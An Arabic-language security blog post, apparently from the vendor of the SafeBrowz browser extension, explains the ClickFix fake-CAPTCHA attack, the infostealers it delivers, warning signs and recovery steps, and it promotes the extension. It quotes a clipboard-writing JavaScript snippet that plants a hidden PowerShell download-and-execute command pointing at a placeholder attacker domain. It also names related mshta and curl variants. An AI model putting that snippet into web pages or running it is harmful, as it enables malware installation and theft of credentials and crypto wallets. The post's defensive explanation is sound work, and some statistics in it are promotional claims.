ما هو ClickFix

ClickFix هو مجموعة هندسة اجتماعية ترتدي زي CAPTCHA. تصل إلى صفحة تبدو وكأنها تحدي "تحقق من أنك إنسان" عادي. شعار Cloudflare Turnstile، وخانة الاختيار المألوفة، وربما شريط تقدم. تنقر عليها. بدلاً من حل الـ CAPTCHA، تقول الصفحة إن التحقق فشل وتعرض ثلاث خطوات "لإصلاحه":

  1. اضغط Win + R على لوحة المفاتيح
  2. اضغط Ctrl + V للصق
  3. اضغط Enter

ما لا تخبرك به الصفحة هو أن النقر على زر الـ CAPTCHA المزيف نسخ بهدوء أمر PowerShell إلى الحافظة. يفتح مربع حوار التشغيل. تلصق. تضغط Enter. يُشغّل Windows برنامج PowerShell، ويتصل بخادم يتحكم فيه المهاجم، ويُنزّل حمولة، ويُشغّلها تحت حسابك. لا موجه. لا تحذير. لا تنزيل. يستغرق الهجوم بأكمله نحو ثماني ثوانٍ من "تحقق من أنك إنسان" إلى الاختراق الكامل للنظام.

يستخدم نوع macOS Terminal بدلاً من Run، والنوع على Linux يستخدم موجهات xdotool، لكن النمط متطابق. صفحة تثق بها تخدعك لتنفيذ كود لم تكتبه.

لماذا يفوّت كل برنامج مكافح فيروسات هذا الهجوم

تبحث حماية النقاط التقليدية عن شيئين: توقيعات البرامج الضارة المعروفة وسلوك العمليات المشبوهة. يهزم ClickFix كليهما بالتصميم.

لا يوجد ملف ضار على القرص عند بدء الهجوم. تعيش حمولة التسليم في سلسلة نصية مُنسخة في حافظتك. العملية التي تُشغّلها هي powershell.exe، وهو ثنائي Microsoft موقّع موجود في قائمة السماح لكل برنامج مكافح فيروسات في السنوات الخمس عشرة الماضية. عندما تسحب PowerShell المرحلة الثانية، غالباً ما تحملها مباشرة في الذاكرة باستخدام Invoke-Expression أو reflection.Assembly.Load، لذا لا تلمس البرامج الضارة نظام الملفات أبداً. التحميل بدون ملفات يعني عدم وجود ملف للفحص.

المسمار الأخير هو الموافقة. المستخدم كتب المفاتيح. المستخدم لصق الأمر. المستخدم ضغط Enter. من منظور نظام التشغيل، هذا مسؤول شرعي يُشغّل مترجماً شرعياً. لا استغلال، لا تصعيد امتيازات، لا CVE للتصحيح. لا يمكنك كتابة توقيع لـ "المستخدم اتبع التعليمات على صفحة ويب." لهذا السبب انتقل ClickFix من فضول بحثي في 2024 إلى نحو 40 بالمئة من جميع حوادث البرامج الضارة المُسلَّمة عبر المتصفح المتتبعة في 2026.

مجموعة السكريبت الدقيقة

معظم صفحات الهبوط لـ ClickFix مبنية من نفس عدد قليل من القوالب، المُباعة أو المسرّبة على Telegram ومنتديات السوق. النمط الهيكلي يمكن التنبؤ به بمجرد أن ترى واحداً. تُحمّل الصفحة غلاف CAPTCHA مقنع، ثم عندما ينقر المستخدم في أي مكان داخل مربع التحدي، ينطلق سكريبت صغير:

const cmd = "powershell -w hidden -c \"iex (iwr 'https://[attacker-domain]/x.ps1')\"";
navigator.clipboard.writeText(cmd);

استدعاء navigator.clipboard.writeText() هو الحيلة بأكملها. تسمح المتصفحات بكتابات الحافظة على إيماءة المستخدم دون موجه إذن، وهو أمر جيد لأزرار النسخ في المواقع العادية لكنه غطاء مثالي هنا. في اللحظة التي ينقر فيها المستخدم على الـ CAPTCHA المزيف، تُستبدل حافظته.

تظهر طبقة ثانية تلوّن لوحة "التحقق فشل" بعد تأخير قصير، عادةً بين 600 و1200 ميلي ثانية. هذا التأخير متعمد. يجعل الفشل يبدو وكأنه CAPTCHA حقيقي ينتهي مهلته بدلاً من مزيف فوري. ثم يُرشد لوحة التعليمات المستخدم خلال Win+R وCtrl+V وEnter، وأحياناً مع سلسلة "robot ID" مزيفة مثل ray-id: 7a3f... مُلحقة بالأمر لجعل النص الملصق يبدو كمدخل تشخيصي بدلاً من أمر shell.

تستبدل البدائل powershell بـ mshta أو curl | iex أو كتل base64 مُشفّرة. تقرأ كتل base64 كهراء في مربع حوار Run، مما يساعد المهاجم في الواقع لأن المستخدمين المرتبكين أكثر ميلاً لاتباع تعليمات "فقط اضغط Enter" دون قراءة.

من يدير هذه الحملات

ClickFix ليس مجموعة واحدة. إنه آلية تسليم تستخدمها عشرات المنتسبين الذين يُغذّون عدداً قليلاً من عائلات البرامج الضارة. يعمل جانب حركة المرور من خلال مواقع WordPress المخترقة والإعلانات الضارة على شبكات إعلانية بمراجعة ضعيفة وتسميم محركات البحث على استعلامات العملات المشفرة الطويلة، وبشكل متزايد من خلال روابط Google Meet وZoom المزيفة.

تدوير النطاقات عدواني. تحرق حملة نموذجية نطاقاً جديداً كل 24 إلى 72 ساعة للبقاء متقدماً على قوائم الحظر. عادةً ما تكون النطاقات مسجلة من خلال موزعين يقبلون العملات المشفرة، ومستضافة على مزودين حصينين، وأمامهم Cloudflare لإخفاء المصدر.

على جانب الحمولة، أكثر العائلات شيوعاً التي نراها مُسلَّمة بصفحات ClickFix هي Vidar وRedLine وLumma وStealC وACR Stealer. كلها سارقو معلومات. تُؤجَّر كخدمة، عادةً 150 إلى 500 دولار أمريكي شهرياً لكل مشغّل، مما يُبقي حاجز الدخول منخفضاً. يمكن لنفس صفحة ClickFix تسليم حمولات مختلفة حسب الموقع الجغرافي أو بصمة المتصفح أو المنتسب الذي يدير حركة المرور في تلك الساعة.

كيف يتم تحقيق الدخل من البرامج الضارة

بمجرد تشغيل سطر PowerShell الواحد، يؤدي سارق المعلومات عمله في أقل من دقيقة. يستهدف قائمة يمكن التنبؤ بها من البيانات عالية القيمة:

  • كلمات المرور المحفوظة من Chrome وFirefox وEdge وBrave وOpera وكل فروع Chromium
  • ملفات تعريف ارتباط الجلسة، وهي أكثر قيمة من كلمات المرور لأنها تتجاوز المصادقة الثنائية
  • تخزين محافظ إضافات المتصفح: MetaMask وPhantom وRabby وRainbow وKeplr وأكثر من ثلاثين محفظة أخرى
  • ملفات المحافظ المكتبية: Exodus وElectrum وAtomic وLedger Live
  • رموز جلسات Discord وTelegram وSteam
  • بيانات الملء التلقائي بما في ذلك بطاقات الائتمان والعناوين
  • لقطات شاشة لسطح المكتب لحظة الإصابة

تُعبّأ البيانات المسروقة في "سجل" وتُرفع إلى خادم قيادة وتحكم. من هناك تصل إلى أحد ثلاثة مسارات. تُستنزف محافظ العملات المشفرة ذات الأرصدة في غضون دقائق، عادةً بواسطة بوت استنزاف آلي يكنس أي محفظة ساخنة بعبارات بذور بنص عادي في تخزين الإضافات. تُعاد بيع ملفات تعريف ارتباط الجلسة للحسابات عالية القيمة مثل البريد الإلكتروني والبورصات ومزودي السحابة بشكل فردي في الأسواق بأسعار تتراوح بين 5 و500 دولار لكل منها. تُباع السجلات الجماعية، التي تحتوي غالباً على بيانات اعتماد لمئات المواقع لكل ضحية، في حزم لمشغّلي حشو بيانات الاعتماد الذين يختبرونها ضد البنوك والبث والمتاجر الإلكترونية للاستيلاء على الحسابات.

إصابة ClickFix ناجحة واحدة على مستخدم عملات مشفرة تساوي في المتوسط 2800 دولار للمشغّل بناءً على بيانات الاستنزاف التي تتبعناها. على مستخدم غير مشفر، الرقم أقرب إلى 40 دولاراً من خلال إعادة بيع بيانات الاعتماد. كلا الرقمين مرتفع بما يكفي لجعل الهجوم مربحاً على نطاق واسع.

4 علامات تُخبرك أنك تنظر إلى ClickFix الآن

  1. تعليمات الـ CAPTCHA تتضمن Win+R أو Terminal أو PowerShell. لا يوجد CAPTCHA شرعي في تاريخ الإنترنت طلب منك يوماً فتح Shell. Cloudflare وGoogle reCAPTCHA وhCaptcha وTurnstile جميعها تعمل داخل الصفحة. إذا أخبرتك خطوة التحقق من كونك إنساناً بضغط اختصارات لوحة مفاتيح تفتح نوافذ نظام، أغلق التبويب.
  2. تقول الصفحة إن التحقق فشل وتطلب منك تشغيل سكريبت. الـ CAPTCHA الحقيقي يفشل بصمت أو يعيد المحاولة. لا يسلمك أمراً يقول "الصق هذا لتثبت أنك إنسان." هذه الصياغة وحدها هي علامة ClickFix.
  3. الرابط نظير لخدمة شرعية لا تستخدمها فعلياً. طُعوم ClickFix الشائعة تُقلّد صفحات تحدي Cloudflare وانضمامات Google Meet وتحديثات Zoom وتحققات DocuSign وموجهات تحديث المتصفح المزيفة. إذا وصلت إلى "تحدي Cloudflare" دون زيارة موقع يستخدم Cloudflare، فثمة خطأ ما.
  4. حافظتك فجأة تحتوي على أمر Shell. إذا وصلت يوماً إلى صفحة مشبوهة وأردت التحقق، افتح Notepad والصق. إذا ما ظهر يبدأ بـ powershell أو mshta أو cmd /c أو curl أو سلسلة base64 طويلة، فقد كنت مستهدفاً. لا تلصقها في أي مكان آخر. امسح حافظتك وابتعد.

ماذا تفعل إذا كنت قد شغّلت الأمر بالفعل

افترض الاختراق الكامل. اتبع هذه الخطوات السبع بالترتيب، من جهاز مختلف إذا أمكن.

  1. افصل الجهاز المصاب عن الإنترنت. افصل كابل Ethernet أو أوقف تشغيل Wi-Fi. يوقف هذا أي استخراج بيانات نشط ويقطع قناة القيادة والتحكم قبل وقوع المزيد من الضرر.
  2. شغّل فحصاً كاملاً بمحركين. Malwarebytes بالإضافة إلى فحص Windows Defender دون اتصال هو مزيج مجاني جيد. غالباً ما تشحن سرّاق المعلومات مع ثبات لا يلتقطه سوى فحص كامل في وقت التشغيل.
  3. غيّر كل كلمة مرور استخدمتها في آخر 24 ساعة. ابدأ ببريدك الإلكتروني الأساسي، لأن من يمتلكه يمكنه إعادة تعيين كل شيء آخر. ثم البنوك وبورصات العملات المشفرة وكلمة مرور مدير كلمات المرور الرئيسية وأي حساب ببيانات دفع. استخدم الجهاز النظيف، لا الجهاز المصاب.
  4. أبطل جميع الجلسات النشطة. تمتلك معظم الخدمات خيار "تسجيل خروج من جميع الأجهزة" في إعدادات الأمان. افعل هذا لـ Google وApple وMicrosoft وDiscord ومدير كلمات المرور وكل بورصة تستخدمها. ملفات تعريف ارتباط الجلسة المسروقة قبل تغيير كلمة المرور لا تزال تعمل حتى قتل الجلسات.
  5. انقل أي عملات مشفرة إلى محفظة جديدة. أنشئ بذرة جديدة على جهاز نظيف، يُفضّل الأجهزة إذا كان لديك واحدة متاحة. انقل الأموال من أي محفظة ساخنة كانت على الجهاز المخترق. لا تعد استخدام البذرة القديمة أبداً، حتى بعد إعادة تثبيت نظيفة. افترض أنها في قاعدة بيانات على خادم سارق.
  6. تحقق من معاملات البنك والعملات المشفرة للـ 48 ساعة القادمة. فعّل كل تنبيه احتيال يقدمه بنكك. راقب التدفقات غير العادية على العناوين على السلسلة. اتصل ببنكك بشكل استباقي إذا أدخلت بيانات بطاقتك على الجهاز المصاب خلال تلك الفترة.
  7. فكّر في إعادة تثبيت كاملة لنظام التشغيل. إذا كان الحساب المخترق يصل إلى أي شيء مهم، فسوّ الجهاز. نظام التشغيل الممسوح وإعادة تثبيته هو الطريقة الوحيدة للتأكد من عدم وجود ثبات. انسخ المستندات احتياطياً على وسائط خارجية وافحصها بشكل منفصل واستعدها بعد إعادة التثبيت بدلاً من استخدام صورة النظام.

للاسترداد الخاص بالعملات المشفرة، راجع دليلنا خطوة بخطوة حول ما يجب فعله عند سرقة عبارة الاسترداد.

كيف يكتشف SafeBrowz ClickFix تحديداً

بنينا ثلاث طبقات مستقلة ضد فئة الهجوم هذه لأنه يمكن تجاوز أي دفاع منفرد. تعمل جميع الثلاث في الإضافة المجانية، وطبقة واحدة فقط في Premium.

الطبقة 1: قائمة حظر النطاقات. كل نطاق تسليم ClickFix معروف وخادم تنظيم وأي نقطة نهاية قيادة وتحكم نتتبعها يُدفع إلى الإضافة بدورة تحديث كل ست ساعات. تُشرَح القائمة من زاحفينا الخاصة وخلاصات التهديدات الشريكة وإرسالات المجتمع. إذا تحمّلت صفحة من نطاق سيئ معروف، يُحجب الطلب قبل أن يُعرض HTML. للسياق حول كيفية عمل كشف النطاقات بشكل عام، راجع مقدمتنا حول كيفية معرفة ما إذا كان موقع ويب احتيالياً.

الطبقة 2: كشف نمط المحتوى. تتخلف قوائم الحظر عن النطاقات الجديدة بساعات أو أيام. لاصطياد الصفحات التي لم نرها من قبل، تفحص الإضافة محتوى الصفحة قبل العرض بحثاً عن بصمات ClickFix: لغة تعليمات Win+R بأي من أكثر من 100 لغة مدعومة، ومكالمات لـ navigator.clipboard.writeText داخل معالجات النقر، ولوحات "التحقق فشل" المزيفة، ومجموعات علامة CAPTCHA مع نص أمر Shell. يعمل تحليل محتوى الذكاء الاصطناعي على أي شيء مشبوه ويُشير إليه حتى عندما لا تطابق الصفحة قالباً معروفاً. يلتقط هذا متغيرات ClickFix من يوم الصفر في البرية.

الطبقة 3: حارس اختطاف الحافظة (Premium). الخيار النووي. أي صفحة تحاول الكتابة في الحافظة دون نقر متعمد واضح على زر نسخ مرئي تُحجب ويُعرض على المستخدم ما حاولت الصفحة نسخه. يوقف هذا سلسلة الهجوم بأكملها في اللحظة الدقيقة التي ستضرب فيها القيادة الضارة حافظتك، بغض النظر عن سمعة النطاق أو أنماط المحتوى.

التفصيل التقني الأعمق لدفاعات ClickFix موجود على صفحة حماية ClickFix.

أسئلة متكررة

هل يعمل SafeBrowz على Mac؟

نعم. تحجب الإضافة موقع تسليم ClickFix على طبقة المتصفح، وهو يعمل بنفس الطريقة على Mac وWindows وLinux وChromeOS. تستهدف حمولة البرامج الضارة Windows في أغلب الأحيان، لكنك محمي من الهبوط على الصفحة في المقام الأول بغض النظر عن نظام التشغيل.

هل الطبقة المجانية كافية؟

بالنسبة لمعظم المستخدمين، نعم. تلتقط طبقتا قائمة الحظر وكشف نمط المحتوى الغالبية العظمى من صفحات ClickFix ومجانيتان إلى الأبد. حارس اختطاف الحافظة في Premium هو خط الدفاع الأخير للمستخدمين الذين يريدون حماية الحزام والحمالات، وخاصة أي شخص يمتلك عملات مشفرة ذات قيمة.

زرت صفحة ClickFix لكنني لم أشغّل شيئاً. هل أنا بأمان؟

نعم. مجرد مشاهدة الصفحة لا يفعل شيئاً. يتطلب الهجوم الضغط على Win+R واللصق وضغط Enter. إذا أغلقت التبويب دون اتباع التعليمات، فلم يُشغَّل أي كود على جهازك. امسح حافظتك لتكون منظماً وتابع.

ما مدى شيوع ClickFix مقارنة بالتصيد الاحتيالي التقليدي؟

في 2026، يتضمن نحو 40 بالمئة من حوادث البرامج الضارة المُسلَّمة عبر المتصفح التي نتتبعها متغير ClickFix. التصيد الاحتيالي التقليدي للبيانات الاعتمادية لا يزال أكبر إجمالاً، لكن ClickFix ينمو بأسرع ما يكون لأنه يهزم مكافحة الفيروسات والمصادقة الثنائية في آنٍ واحد. توقع استمرار ارتفاعه.

لماذا لا تحجب المتصفحات هذا بشكل أصلي؟

لأنه تقنياً لا شيء في المتصفح مكسور. المستخدم نقر على زر. الصفحة كتبت في الحافظة على إيماءة مستخدم، وهو أمر مسموح به. ثم فتح المستخدم Shell الخاص به ولصق. من منظور Chrome، كل خطوة عمل مشروع. يجب أن يعيش الدفاع طبقة واحدة أعلى، وهو المكان الذي تكتسب فيه إضافة مخصصة أهميتها.

ثبّت SafeBrowz مجاناً. متعدد المتصفحات، أكثر من 500 علامة تجارية متتبعة، تحليل محتوى الذكاء الاصطناعي بأكثر من 100 لغة، ونعم دفاعات ClickFix الموصوفة أعلاه. لا حاجة لحساب.

Chrome أضف إلى Chrome Firefox أضف إلى Firefox Edge أضف إلى Edge

قراءات ذات صلة: نظرة عامة على حماية ClickFix · كيف تعرف أن موقعاً ما احتيالي · سرقة عبارة الاسترداد: دليل الاسترداد · جميع المقالات · الرئيسية SafeBrowz